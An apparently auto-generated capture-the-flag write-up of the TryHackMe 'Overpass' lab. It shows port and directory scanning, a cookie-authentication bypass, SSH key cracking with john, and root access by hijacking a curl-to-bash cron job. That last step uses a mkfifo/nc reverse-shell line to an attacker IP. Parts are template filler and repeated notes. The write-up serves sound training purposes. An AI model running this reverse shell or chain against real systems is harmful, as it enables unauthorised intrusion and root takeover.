TryHackMe - Overpass (Linux)
TryHackMe Overpass Linux マシン解説。実践的な悪用手順と権限昇格テクニックを解説。
TryHackMe - Overpass (Linux)
概要
| 項目 | 内容 |
|---|---|
| OS | Linux |
| 難易度 | 記録なし |
| 攻撃対象 | 22/tcp open ssh, 80/tcp open http |
| 主な侵入経路 | web, ssh attack path to foothold |
| 権限昇格経路 | Local misconfiguration or credential reuse to elevate privileges |
偵察
1. PortScan
Rustscan
💡 なぜ有効か
High-quality reconnaissance narrows a large attack surface into a few validated exploitation paths. Accurate service mapping prevents time loss and supports targeted follow-up testing.
初期足がかり
Not implemented (not recorded in PDF)
Nmap
1
nmap -sV -sT -sC $ip
2. Local Shell
PDFメモから抽出した主要コマンドと要点を整理しています。必要に応じて後続で詳細追記してください。
実行コマンド(抽出)
1
2
3
4
5
6
john --wordlist=/usr/share/wordlists/rockyou.txt crack
ssh -i james_rsa james@$ip
mkdir -p downloads/src
cd downloads/src/
nc -lvnp 1234
cat /root/root.txt
抽出画像
画像抽出なし(PDF内に有効な埋め込み画像なし)
抽出メモ(先頭120行)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
Overpass
June 6, 2023 23:46
WriteUp that was helpful
https://0xnirvana.medium.com/tryhackme-overpass-90abe32320a1
https://termack.github.io/thm_writeups/overpass
1.Searching for the target
First of all nmap
nmap -sV -sT -sC $ip
Make sure 22 and 80 are open
┌──(n0z0㉿kali)-[~/work/thm]
└─$ nmap -sV -sT -sC $ip
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-06 23:51 JST
Nmap scan report for 10.10.192.163
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37968598d1009c1463d9b03475b1f957 (RSA)
| 256 5375fac065daddb1e8dd40b8f6823924 (ECDSA)
|_ 256 1c4ada1f36546da6c61700272e67759c (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.00 seconds
2. Subdomain search
┌──(n0z0㉿kali)-[~/work/thm]
└─$ ffuf -w ../../SecLists/Discovery/Web-Content/common.txt -u http://$ip/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.5.0 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.192.163/FUZZ
:: Wordlist : FUZZ: ../../SecLists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
aboutus [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 281ms]
admin [Status: 301, Size: 42, Words: 3, Lines: 3, Duration: 307ms]
css [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 325ms]
downloads [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 293ms]
img [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 316ms]
index.html [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 311ms]
render/https://www.google.com [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
:: Progress: [4715/4715] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:38] :: Errors: 0 ::
Since you have admin, you can probably log in from here.
3. Log in with an appropriate cookie
OneNote
1/3
There is a detailed explanation here
https://0xnirvana.medium.com/tryhackme-overpass-90abe32320a1
After opening the console with F12, type the following
Break through cookie authentication
> Cookies.set("SessionToken", 'myCookieValue')
4.ssh login
Because there is a certificate after logging into the web
Download and make it available for ssh
ssh2john james_rsa > crack
Obtain passphrase using crack file
john --wordlist=/usr/share/wordlists/rockyou.txt crack
ssh login
ssh -i james_rsa james@$ip
5. Privilege escalation
I looked at cron and there are jobs that look good.
cat /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
↑Since the name is resolved by host name, rewrite hosts.
Create directories on the remote host and on your own host according to the directory structure
$ mkdir -p downloads/src
$ cd downloads/src/
/downloads/src$ touch buildscript.sh
Editing the shell locally
/downloads/src$ nano buildscript.sh
#!/bin/bash
cat /root/root.txt > /tmp/flag
james@overpass-prod:/tmp$ touch flag
james@overpass-prod:/tmp$ chmod 777 flag
Becomes a server on the host side
sudo python3 -m http.server 80
When you look at tmp/flag on the attacking side, it is written
If you separately launch the console and wait on nc
Reverse shell succeeds
* Shell execution on the client side ⇒ Waiting on the own host side,
Reverse shell success
5-1 Reverse Shell Part 2
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Creating a reverse shell for sending on the own host side
mkdir downloads
mkdir downloads/src
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_VPN_IP> 1234 >/tmp/f" > downloads/src/buildscript.sh
Start the python server on the local host
sudo python3 -m http.server 80
Start another terminal and wait for the reverse shell executed on the remote host side
┌──(n0z0㉿kali)-[~/work/thm/Overpass]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.11.41.68] from (UNKNOWN) [10.10.201.183] 46554
/bin/sh: 0: can't access tty; job control turned off
### cat /root/root.txt
thm{7f336f8c359dbac18d54fdd64ea753bb}
#
OneNote
2/3
OneNote
3/3
Not implemented (not recorded in PDF)
💡 なぜ有効か
Initial access succeeds when enumeration findings are turned into a practical exploit chain. Capturing credentials, file disclosure, or direct RCE creates reliable pivot points for privilege escalation.
権限昇格
3.Privilege Escalation
Privilege elevation related commands extracted from PDF memo.
💡 なぜ有効か
Privilege escalation depends on chaining local weaknesses such as sudo misconfiguration, weak file permissions, or credential reuse. If a GTFOBins technique is used, the mechanism is that an allowed binary executes a child process or shell without dropping elevated effective privileges.
認証情報
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
https://0xnirvana.medium.com/tryhackme-overpass-90abe32320a1
https://termack.github.io/thm_writeups/overpass
┌──(n0z0㉿kali)-[~/work/thm]
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
└─$ ffuf -w ../../SecLists/Discovery/Web-Content/common.txt -u http://$ip/FUZZ
\/_/ \/_/ \/___/ \/_/
:: URL : http://10.10.192.163/FUZZ
:: Wordlist : FUZZ: ../../SecLists/Discovery/Web-Content/common.txt
render/https://www.google.com [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 338ms]
:: Progress: [4715/4715] :: Job [1/1] :: 116 req/sec :: Duration: [0:00:38] :: Errors: 0 ::
2026/02/27 17:41
john --wordlist=/usr/share/wordlists/rockyou.txt crack
cat /etc/crontab
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
$ mkdir -p downloads/src
$ cd downloads/src/
/downloads/src$ touch buildscript.sh
まとめ・学んだこと
4.Overview
flowchart LR
subgraph SCAN["🔍 Scan"]
direction TB
S1["Port and web enumeration"]
end
subgraph INITIAL["💥 Initial Foothold"]
direction TB
I1["Initial foothold from extracted workflow"]
end
subgraph PRIVESC["⬆️ Privilege Escalation"]
direction TB
P1["Privilege escalation from extracted notes"]
end
SCAN --> INITIAL --> PRIVESC
参考文献
- nmap
- rustscan
- ffuf
- john
- nc
- sudo
- ssh
- curl
- cat
- GTFOBins
This post is licensed under CC BY 4.0 by the author.